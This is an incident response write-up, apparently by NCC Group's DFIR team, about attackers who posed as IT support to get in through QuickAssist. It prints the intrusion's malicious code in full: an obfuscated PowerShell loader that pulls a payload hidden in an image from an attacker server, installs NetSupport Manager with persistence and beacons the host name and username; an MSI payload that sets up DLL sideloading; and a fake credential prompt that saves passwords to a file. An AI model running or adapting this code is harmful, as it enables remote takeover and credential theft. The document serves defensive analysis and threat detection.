Rapid Breach: Social Engineering to Remote Access in 300 Seconds

Tldr;

This post explains a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving a social engineering attack followed by the quick succession of PowerShell commands, leading to compromise.

Below provides a summary of findings which are presented in this blog post:

• Initial access via social engineering
• Use of QuickAssist.exe to execute PowerShell commands
• System compromise and credentials harvesting

Incident Overview

The Threat Actor targeted around twenty users, impersonating IT support personnel, and successfully convinced two users to grant remote access to their system using the Windows native QuickAssist remote support tool.

In less than five minutes the Threat Actor executed PowerShell commands that led to the download of offensive tooling, malware execution and the creation of persistence mechanisms.

MITRE TTPs

Initial Access

T1566 – Phishing

Through social engineering users were convinced to allow remote access to their systems via QuickAssist support tool.

Execution

T1059.001 - Command and Scripting Interpreter: PowerShell

The following PowerShell commands were executed after the Threat Actor established a connection via QuickAssist:

 N)';$k=$p.DownloadString('hxxps://resutato[.]com/b2/tap.php?tap='+[Net.Dns]::GetHostName());(&([ScriptBlock]::Create($k))); 
curl -o update.zip hxxp://196.251.69[.]195:8085/update.zip 
explorer.exe  C:\Users\{username}\AppData\Roaming 
cd update 
msiexec.exe -i update.msi -q

The first command copies the second command to the clipboard of the host. `

(curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard.

The second command

[Net.ServicePointManager]::SecurityProtocol=3072;$p=New-Object Net.WebClient;$p.Headers['User-Agent']='Mozilla/5.0 (Windows; N)';$k=$p.DownloadString('hxxps://resutato[.]com/b2/tap.php?tap='+[Net.Dns]::GetHostName());(&([ScriptBlock]::Create($k)));

downloads and executes the following PowerShell script:

& { cd $eNV:apPDATA; $POwNpQkB='hxxps://resutato[.]com/b2/srs/'; $mAKG='NetHealth'; $NuSbQ='hxxps://resutato[.]com/b2/res/nh2.jpg'; $XpaWuQ=@('PCICHEK.DLL', 'remcmdstub.exe', 'pcicapi.dll', 'NetHealth.exe', 'AudioCapture.dll', 'NSM.LIC', 'nskbfltr.inf', 'TCCTL32.DLL', 'nsm_vpro.ini', 'PCICL32.DLL', 'client32.ini', 'msvcr100.dll', 'HTCTL32.DLL'); [nET.SErVicEpoiNTmANAGER]::SECuRItYpRotoCOL=[nET.seCURITyPrOtOcoLTYpe]::Tls12; try { $iQPPZ=-1; $DqGpjMG=New-Object System.Net.WebClient; [byte[]]$rayDe=$DqGpjMG.DownloadData($NuSbQ); $DqGpjMG.Dispose(); Add-Type -AssemblyName System.IO[.]compression, System.IO[.]compression.FileSystem; [byte[]]$GSHLkr = 0x31, 0x67, 0xBE, 0xE1; for ($i=0; $i -le $rayDe.Length-4; $i++) {  if (($rayDe[$i] -eq $GSHLkr[0]) -and ($rayDe[$i+1]-eq $GSHLkr[1]) -and ($rayDe[$i+2]-eq $GSHLkr[2]) -and ($rayDe[$i+3]-eq $GSHLkr[3])) { $iQPPZ=$i; break; } }; if ($iQPPZ -lt 0) { throw 'Marker not found' }; $qoBSqLF=$rayDe[($iQPPZ+6)..($rayDe.Length-1)]; $mHyad=[int]$rayDe[$iQPPZ+5] - 128; $BHyY=$rayDe[0..($iQPPZ-1)]; $YcDNuxbM=New-Object 'System.Collections.Generic.List[byte]'; [int]$UhwzVYYp=$rayDe[$iQPPZ+4]; for ($o=0; $o -lt $BHyY.Length; $o += 2*$UhwzVYYp) { $take=[Math]::Min($UhwzVYYp, [int]($BHyY.Length-$o)); $YcDNuxbM.AddRange([byte[]]$BHyY[$o..($o+$take-1)]); }; [byte[]]$ajaAIt=$YcDNuxbM.ToArray(); [byte[]]$PQnpWhMg=New-Object byte[] $qoBSqLF.Length; $dPqpOMvV=Join-Path $env:APPDATA $mAKG; if (-not (Test-Path $dPqpOMvV)) { New-Item -Force -ItemType Directory -Path $dPqpOMvV | Out-Null }; $XjlghtUe=gi $dPqpOMvV -force; $XjlghtUe.attributes='Hidden'; for ($i=0; $i -lt $qoBSqLF.Length; $i++) { $PQnpWhMg[$i] = $qoBSqLF[$i] -bxor $ajaAIt[$i % $ajaAIt.Length]; }; $YyNd=[int]([math]::Floor($PQnpWhMg.Length/2)) + $mHyad; $unoEed=$PQnpWhMg.Length - $YyNd; $sMFzCAGe=$PQnpWhMg[$unoEed..($PQnpWhMg.Length-1)] + $PQnpWhMg[0..($unoEed-1)]; $ms=New-Object IO.MemoryStream(,$sMFzCAGe); $za=New-Object IO[.]compression.ZipArchive($ms,[IO[.]compression.ZipArchiveMode]::Read); foreach ($e in $za.Entries) {     $dst=[IO.File]::Create((Join-Path $dPqpOMvV $e.Name));     $e.Open().CopyTo($dst); $dst.Close(); } $za.Dispose(); $ms.Dispose(); } catch { $dPqpOMvV=Join-Path $env:APPDATA $mAKG; if (-not (Test-Path $dPqpOMvV)) { New-Item -Force -ItemType Directory -Path $dPqpOMvV | Out-Null }; $XjlghtUe=gi $dPqpOMvV -force; $XjlghtUe.attributes='Hidden'; if (Get-Command Start-BitsTransfer -ErrorAction SilentlyContinue) {     $XpaWuQ | % {     Start-BitsTransfer -Source ($POwNpQkB + $_) -Destination (Join-Path $dPqpOMvV $_);     } } else {     $XpaWuQ | % {         $igYCy=$POwNpQkB + $_;         $idQGm=Join-Path $dPqpOMvV $_;         $zmqS='bitsadmin.exe /transfer NetHealth /download /priority normal "0" "1"' -f $igYCy,$idQGm;         iex $zmqS;     };     }; };try { net session > $null 2>&1; $KxzMqEBJ=$?; } catch { $KxzMqEBJ=$false; }; $mYSbjz=Join-Path (Join-Path $env:APPDATA $mAKG) 'NetHealth.exe'; Start-Process -FilePath $mYSbjz -WorkingDirectory (Split-Path $mYSbjz); if ($KxzMqEBJ) { $xyDHlIKk=New-Object -ComObject 'Schedule.Service'; $xyDHlIKk.Connect(); $Mneyz=$xyDHlIKk.GetFolder('\'); $EDGmttky=$xyDHlIKk.NewTask(0); $HKaPQlqW=$EDGmttky.Triggers.Create(9); $Naqu=$EDGmttky.Actions.Create(0); $NTPZQf=$EDGmttky.Settings; $WJCem=$EDGmttky.RegistrationInfo; $NTPZQf.RunOnlyIfNetworkAvailable=$true; $NTPZQf.StopIfGoingOnBatteries=$false; $NTPZQf.RestartInterval='PT5M'; $NTPZQf.AllowHardTerminate=$false; $NTPZQf.Hidden=$true; $NTPZQf.DisallowStartIfOnBatteries=$false; $WJCem.Description='Scheduled system NetHealth task'; $WJCem.Author=$env:USERNAME; $HKaPQlqW.Id='LogonTriggerId'; $Naqu.Path=$mYSbjz; $NTPZQf.Priority=4; $HKaPQlqW.UserId=$env:USERNAME; $NTPZQf.ExecutionTimeLimit='PT0S'; $NTPZQf.RestartCount=50; $NTPZQf.StartWhenAvailable=$true; $EDGmttky.Principal.RunLevel=1; $Mneyz.RegisterTaskDefinition($mAKG,$EDGmttky,6,$env:USERNAME,$null,3); } else { New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name $mAKG -Value $mYSbjz -PropertyType String -Force | Out-Null;}; $odfAYgx=Get-Process NetHealth -ErrorAction SilentlyContinue; $VsQEC="hxxps://resutato[.]com/b2/st/st.php?cpnme=$eNV:CoMPuTeRNAME&usnme=$env:uSernAme&param="; IF ($odfAYgx.ID) { $CaSRw=$VsQEC+'zlLDBzqCcj'; curl $CaSRw -USeBAsIcparsInG;} else { $CaSRw=$VsQEC+'oXaYKeNOjn'; iwr $CaSRw -UsEbaSIcpaRsiNG;}; } *> $null

This script performs the following actions:

• Setup and Variables: Changes directory to %APPDATA%, defines URLs and filenames and sets TLS 1.2 for secure downloads.
• Payload Download and Extraction: the script downloads a picture (see the picture below) from the URL hxxps[:]//resutato[.]com/b2/res/nh2.jpg, which contains an encrypted payload in the form of a .zip file. Once decrypted and executed, the payload creates a directory at C:\Users\{username}\AppData\Roaming\NetHealth\ which contains the remote management software NetSupport Manager, along with the DLLs needed for it to work without installation on the system.
• Fallback Download Method: If the image-based method fails, the script downloads a list of files directly from the server using Start-BitsTransfer or bitsadmin.
• Payload execution: Runs the binary NetHealth.exe, and adds the registry key HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\NETHEALTH\C:\Users\{username}\AppData\Roaming\NetHealth\NetHealth.exe to run the binary every time the user logs in.
• Command and Control (C2) Beacon: Sends a request to hxxps[:]//resutato[.]com/b2/st/st.php with the Computer name, Username and the status of the NetHealth process.

The third command curl -o update.zip hxxp://196.251.69[.]195:8085/update.zip downloads the file update.zip to the roaming folder of the current user's profile (C:\Users{username}\AppData\Roaming) from the URL: hxxp://196.251.69[.]195:8085/update.zip

The command (msiexec.exe -i update.msi -q) executes the file update.msi which was found within the compressed zip file update.zip.

The file update.msi contained the following hidden payload:

$u = "hxxps://nimbusvaults[.]com/update/Z4Vw.zip" 
$f = "GenUp.exe" 
$r = get-random -max 999999 
$z = join-path $env:temp "u" + $r + ".zip" 
$d = join-path $env:temp "d" + $r 
iwr "https://nimbusvaults.com/update/Z4Vw.zip" -usebasicparsing -outfile $z 
expand-archive $z $d -force 
rm $z -ea 0 
$e = dir $d -filter $f -recurse -erroraction silentlycontinue|select -first 1 
if ($e) { 
  saps $e.fullname -workingdirectory $e.directoryname 
}

This payload downloads a file named Z4Vw.zip from the URL hxxps://nimbusvaults[.]com/update/Z4Vw.zip and extracts it to the path C:\Users\{username}\AppData\Local\Temp\{string}\. The archive contains a legitimate Notepad++ updater binary, GenUp.exe, several files consistent with legitimate use, and a malicious DLL named libcurl.dll. This DLL is a known trojan that establishes communication with a C2 server hosted on nimbusvaults[.]com. The Threat Actor executed the legitimate GenUp.exe binary and used it to sideload the malicious DLL libcurl.dll.

Persistence

T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The registry key HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\NETHEALTH\ was added to launch the executable file C:\Users\{username}\AppData\Roaming\NetHealth\NetHealth.exe when the user logs in.

T1053.005 - Scheduled Task/Job: Scheduled Task

The scheduled task EventLogBackupTask was created and configured to run every five minutes. This task executes the command C:\windows\System32\regsvr32.exe -e -n -i:"user" "C:\Users\{username}\AppData\Roaming\{string}\{string}.dll".

With this command, the Threat Actor is executing the malicious binary libcurl.dll with a randomly generated name. This task was created on the hosts in a folder with randomly generated names in the path C:\Users\{username}\AppData\Roaming\, executing the same DLL with also a randomly generated name.

Credential Access

T1056.002 - Input Capture: GUI Input Capture

The threat actor executed the script C:\Users\{username}\Videos\l.ps1 which creates a GUI window prompting the user to input their credentials, which are then written to the file C:\Users\{username}\AppData\Local\Temp\cred.txt.

Add-Type -AssemblyName PresentationFramework, System.Xaml 
$signature = @' 
[DllImport("user32.dll", SetLastError = true)] 
public static extern IntPtr FindWindow(string lpClassName, string lpWindowName); 
[DllImport("user32.dll", SetLastError = true)] 
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); 
'@ 
Add-Type -MemberDefinition $signature -Namespace WinAPI -Name User32 
[xml]$xaml = @" 
<Window xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" 
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" 
        Title="System Credential Verification" WindowStyle="None" 
        Background="Transparent" AllowsTransparency="True" 
        WindowStartupLocation="CenterScreen" 
        Topmost="True" ResizeMode="NoResize"> 
    <Grid> 
        <Rectangle Name="Overlay" Fill="#AA000000" IsHitTestVisible="True"/> 
        <Border HorizontalAlignment="Center" VerticalAlignment="Center" 
                BorderBrush="#DDD" BorderThickness="1" Padding="20" 
                Background="White" CornerRadius="5"> 
            <StackPanel Width="350"> 
                <TextBlock Text="For security reasons, we need to verify your account credentials." TextWrapping="Wrap" 
                           Margin="0,0,0,20" FontSize="14" HorizontalAlignment="Center"/> 
                <TextBlock Text="Please re-enter your username and password to continue using this device." TextWrapping="Wrap" 
                           Margin="0,0,0,20" FontSize="13" Foreground="Gray" HorizontalAlignment="Center"/> 
                <TextBox Name="UsernameBox" Margin="0,0,0,10" Width="250" Height="30" FontSize="14" /> 
                <PasswordBox Name="PasswordBox" Width="250" Height="30" FontSize="14"/> 
                <Button Name="LoginBtn" Content="Login" Margin="0,20,0,0" Width="100" Height="30" 
                        /> 
            </StackPanel> 
        </Border> 
    </Grid> 
</Window> 
"@ 
$reader = New-Object System.Xml.XmlNodeReader $xaml 
$window = [Windows.Markup.XamlReader]::Load($reader) 
$UsernameBox = $window.FindName("UsernameBox") 
$PasswordBox = $window.FindName("PasswordBox") 
$LoginBtn = $window.FindName("LoginBtn") 
$screenWidth = [System.Windows.SystemParameters]::PrimaryScreenWidth 
$screenHeight = [System.Windows.SystemParameters]::PrimaryScreenHeight 
$window.Width = $screenWidth 
$window.Height = $screenHeight 
$window.WindowStartupLocation = "CenterScreen" 
function Hide-Taskbar { 
    $taskbarHandle = [WinAPI.User32]::FindWindow("Shell_TrayWnd", $null) 
    if ($taskbarHandle -ne [IntPtr]::Zero) { 
        [WinAPI.User32]::ShowWindow($taskbarHandle, 0) # SW_HIDE 
    } 
} 
function Show-Taskbar { 
    $taskbarHandle = [WinAPI.User32]::FindWindow("Shell_TrayWnd", $null) 
    if ($taskbarHandle -ne [IntPtr]::Zero) { 
        [WinAPI.User32]::ShowWindow($taskbarHandle, 5) # SW_SHOW 
    } 
} 
$script:timer = $null 
$LoginBtn.Add_Click({ 
    $username = $UsernameBox.Text.Trim() 
    $password = $PasswordBox.Password.Trim() 
    if ([string]::IsNullOrWhiteSpace($username) -or [string]::IsNullOrWhiteSpace($password)) { 
        [System.Windows.MessageBox]::Show("Both fields are required.", "Error", "OK", "Error") 
        return 
    } 
    $output = "Username: $username`nPassword: $password`n-------------------`n" 
    Add-Content -Path "$env:TEMP\cred.txt" -Value $output 
    try { 
        $securePass = ConvertTo-SecureString $password -AsPlainText -Force 
        $credential = New-Object System.Management.Automation.PSCredential ($username, $securePass) 
        $null = Start-Process cmd.exe -Credential $credential -ArgumentList "/c exit" -WindowStyle Hidden -ErrorAction Stop 
        [System.Windows.MessageBox]::Show("Authentication successful!", "Success", "OK", "Information") 
        $script:timer.Stop() # Останавливаем таймер 
        $window.Close() 
    } catch { 
        [System.Windows.MessageBox]::Show("Invalid username or password.", "Authentication Failed", "OK", "Error") 
    } 
}) 
$window.Add_KeyDown({ 
    param($sender, $e) 
    switch ($e.Key) { 
        ([System.Windows.Input.Key]::LWin)     { $e.Handled = $true } 
        ([System.Windows.Input.Key]::RWin)     { $e.Handled = $true } 
        ([System.Windows.Input.Key]::System)   { $e.Handled = $true } 
        ([System.Windows.Input.Key]::Escape)   { $e.Handled = $true } 
        ([System.Windows.Input.Key]::LeftAlt)  { $e.Handled = $true } 
        ([System.Windows.Input.Key]::RightAlt) { $e.Handled = $true } 
        ([System.Windows.Input.Key]::Tab)      { $e.Handled = $true } 
        default {} 
    } 
}) 
$window.Add_ContentRendered({ 
    Hide-Taskbar 
})

Command and Control

T1071.001 - Application Layer Protocol: Web Protocols

The script downloaded and executed by the Threat Actor using PowerShell sends a request to hxxps[:]//resutato[.]com/b2/st/st.php with the Computer name, Username and the status of the NetHealth process.

Malicious Payload Deep Dive

As described above, this script performs a series of malicious actions in a very short span of time.

1. Downloads a JPEG file that contains embedded malicious data

   $NuSbQ = 'hxxps://resutato[.]com/b2/res/nh2.jpg'
   

2. Marker Search and Extraction: a. Searches for a magic marker in the byte stream to locate the payload

   $GSHLkr = 0x31, 0x67, 0xBE, 0xE1 
   for ($i = 0; $i -le $rayDe.Length - 4; $i++) { 
       if ( 
           ($rayDe[$i] -eq $GSHLkr[0]) -and 
           ($rayDe[$i+1] -eq $GSHLkr[1]) -and 
           ($rayDe[$i+2] -eq $GSHLkr[2]) -and 
           ($rayDe[$i+3] -eq $GSHLkr[3]) 
       ) { 
           $iQPPZ = $i 
           break 
       } 
   }
   

   This loop scans the downloaded byte array ($rayDe) for a 4-byte marker: 31 67 BE E1. When found, it stores the index in $iQPPZ.
   a. Once the marker is found, the payload splits the byte array into: Encrypted data; Metadata; Key Material. i. Encrypted Payload: This is the main encrypted data, starting 6 bytes after the marker.

   $qoBSqLF = $rayDe[($iQPPZ + 6)..($rayDe.Length - 1)]
   

   ii. Metadata: These two bytes just before the encrypted payload are used as: $mHyad: an offset for reordering the decrypted data. $UhwzVYYp: a chunk size for key derivation.

   $mHyad = [int]$rayDe[$iQPPZ + 5] - 128 
   $UhwzVYYp = [int]$rayDe[$iQPPZ + 4]
   

   iii. Key Material: This logic extracts key material from the beginning of the file up to the marker. It takes every other $UhwzVYYp-sized chunk to build the XOR key ($ajaAIt).

   $BHyY = $rayDe[0..($iQPPZ - 1)] 
   $YcDNuxbM = New-Object 'System.Collections.Generic.List[byte]' 
   for ($o = 0; $o -lt $BHyY.Length; $o += 2 * $UhwzVYYp) { 
    $take = [Math]::Min($UhwzVYYp, int) 
    $YcDNuxbM.AddRange([byte[]]$BHyY[$o..($o + $take - 1)]) 
   } 
   $ajaAIt = $YcDNuxbM.ToArray()
   

3. Decryption: Uses XOR decryption with a derived key to decrypt the payload $qoBSqLF contains the encrypted payload $ajaAIt is the derived XOR key

   [byte[]]$PQnpWhMg = New-Object byte[] $qoBSqLF.Length 
   for ($i = 0; $i -lt $qoBSqLF.Length; $i++) { 
    $PQnpWhMg[$i] = $qoBSqLF[$i] -bxor $ajaAIt[$i % $ajaAIt.Length] 
   }
   

   $qoBSqLF: The encrypted byte array extracted from the image. $ajaAIt: The key derived from the pre-marker section of the image. $PQnpWhMg: The resulting decrypted byte array.

The loop applies a byte-wise XOR between each byte of the encrypted payload and the corresponding byte of the key (repeating the key as needed using modulo). This is a classic XOR cipher used in many malware loaders to obfuscate payloads.

1. Payload Reordering: After XOR decryption, the payload is reordered to reconstruct the original ZIP archive. Calculates a split point using $mHyad, a value extracted from metadata and rotates the decrypted byte array, so the tail becomes the head

   $YyNd = int) + $mHyad 
   $unoEed = $PQnpWhMg.Length - $YyNd 
   $sMFzCAGe = $PQnpWhMg[$unoEed..($PQnpWhMg.Length - 1)] + $PQnpWhMg[0..($unoEed - 1)]
   

2. Unpacking: Once reordered, the payload is treated as a ZIP archive and unpacked. Creates a memory stream from the reordered payload. Opens it as a ZIP file and extracts each file on the path %APPDATA%\NetHealth

   $ms = New-Object IO.MemoryStream(, $sMFzCAGe) 
   $za = New-Object IO.Compression.ZipArchive($ms, [IO.Compression.ZipArchiveMode]::Read) 
   foreach ($e in $za.Entries) { 
    $dst = [IO.File]::Create((Join-Path $dPqpOMvV $e.Name)) 
    $e.Open().CopyTo($dst) 
    $dst.Close() 
   } 
   $za.Dispose() 
   $ms.Dispose()
   

3. Execution: the main executable is launched

   $mYSbjz = Join-Path (Join-Path $env:APPDATA $mAKG) 'NetHealth.exe' 
   Start-Process -FilePath $mYSbjz -WorkingDirectory (Split-Path $mYSbjz)
   

4. Persistence: a scheduled task is created and added in registry a. Scheduled Task: ``` $xyDHlIKk = New-Object -ComObject 'Schedule.Service' $xyDHlIKk.Connect() $Mneyz = $xyDHlIKk.GetFolder('\') $EDGmttky = $xyDHlIKk.NewTask(0)

$HKaPQlqW = $EDGmttky.Triggers.Create(9) # Logon trigger $Naqu = $EDGmttky.Actions.Create(0) # Start a program $Naqu.Path = $mYSbjz # Path to NetHealth.exe

$NTPZQf = $EDGmttky.Settings $WJCem = $EDGmttky.RegistrationInfo

$NTPZQf.RunOnlyIfNetworkAvailable = $true $NTPZQf.StopIfGoingOnBatteries = $false $NTPZQf.RestartInterval = 'PT5M' $NTPZQf.AllowHardTerminate = $false $NTPZQf.Hidden = $true $NTPZQf.DisallowStartIfOnBatteries = $false

$WJCem.Description = 'Scheduled system NetHealth task' $WJCem.Author = $env:USERNAME

$HKaPQlqW.Id = 'LogonTriggerId' $HKaPQlqW.UserId = $env:USERNAME

$NTPZQf.Priority = 4 $NTPZQf.ExecutionTimeLimit = 'PT0S' $NTPZQf.RestartCount = 50 $NTPZQf.StartWhenAvailable = $true

$EDGmttky.Principal.RunLevel = 1 # Run with highest privileges

$Mneyz.RegisterTaskDefinition($mAKG, $EDGmttky, 6, $env:USERNAME, $null, 3)

    b. Registry Key:

New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $mAKG -Value $mYSbjz -PropertyType String -Force | Out-Null

8. Command and Control beaconing: Builds a URL with the computer name, username, and a status code.

$VsQEC = "hxxps://resutato.com/b2/st/st[.]php?cpnme=$eNV:CoMPuTeRNAME&usnme=$env:uSernAme&param="

IF ($odfAYgx.ID) { $CaSRw = $VsQEC + 'zlLDBzqCcj' curl $CaSRw -UseBasicParsing } else { $CaSRw = $VsQEC + 'oXaYKeNOjn' iwr $CaSRw -UseBasicParsing } ```

Conclusions

The actions described above were completed by the threat actor in a session that lasted two minutes and forty-seven seconds, fortunately this was caught by the internal security team which isolated the hosts, preventing a bigger infection. Even when a security breach appears brief or limited in scope, it must be thoroughly investigated. The potential consequences of disregarding the risks can be severe, ranging from financial loss to reputational damage.

User awareness training is a fundamental part of any organisation’s security posture and strategy and must be given the attention it deserves. Continuous education and strong incident response processes are essential to safeguarding business operations.

IOCs